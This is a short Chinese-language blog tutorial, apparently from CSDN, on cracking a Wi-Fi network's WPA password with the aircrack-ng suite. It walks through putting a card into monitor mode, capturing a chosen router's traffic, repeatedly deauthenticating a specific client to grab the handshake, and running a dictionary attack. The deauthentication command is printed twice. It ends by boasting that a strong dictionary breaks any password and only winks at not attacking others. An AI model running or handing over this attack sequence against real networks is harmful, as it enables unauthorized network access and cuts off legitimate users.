http://blog.csdn.net/wingstudio_zongheng/article/details/51435212
1.前期准備
1)打開一個終端 執行命令:
ifconfig #查看無線網卡,找到他的name(我的無線網卡名字為wlano 接下來我就以我的無線網卡名做講解)
ifconfig wlan0 down #關閉無線網卡(ifconfig 無線網卡名 down)
iwconfig wlan0 mode monitor # 將無線網卡模式改為監聽模式(iwconfig 無線網卡名 mode 更改的模式)
ifconfig wlan0 up #啟用無線網卡
airmon-ng start wlan0 將網卡轉換為監聽模式,你將會看到下列信息
airodump-ng wlan0 #開始掃描附近的無線網絡
1.bassid #路由器的mac地址
2.CH #信道
3.ENC #加密方式
2.准備攻擊
1)執行命令如下(這里用libiaowif768做實例)
airodump-ng -c 11 -w test --bssid 00:71:CC:17:CB:5C wlan0 #命令含義:airodump-ng -c 信道 -w 抓包生成的文件名 --bssid 路由器的mac地址 本機使用的抓包網卡名 # 得到該無線的網絡狀態信息,執行命令你會看到下圖
aireplay-ng -0 10 -a 00:71:CC:17:CB:5C -c 94:E9:6A:92:4E:A4 wlan0 #命令含義:aireplay-ng -0 10 -a 路由器mac地址 -c 客戶端mac地址 本機使用的抓包網卡名 #打斷客戶端鏈接該路由器的鏈接,抓包。(這里新建一個終端),執行命令后你會看到下圖
aireplay-ng -0 10 -a 00:71:CC:17:CB:5C -c 94:E9:6A:92:4E:A4 wlan0 #命令含義:aireplay-ng -0 10 -a 路由器mac地址 -c 客戶端mac地址 本機使用的抓包網卡名 #打斷客戶端鏈接該路由器的鏈接,抓包。(這里新建一個終端),執行命令后你會看到下圖
3.密碼破解
1)執行命令如下
aircrack-ng -w /wnt/a/1pass01.txt wode.cap #命令含義:aircrack-ng -w 字典包位置 抓包生成的文件名.cap #跑字典解密
只要你的字典夠強打就沒有破解不了的密碼,請打家不要而已破壞別人的無線(呵呵,你懂得)。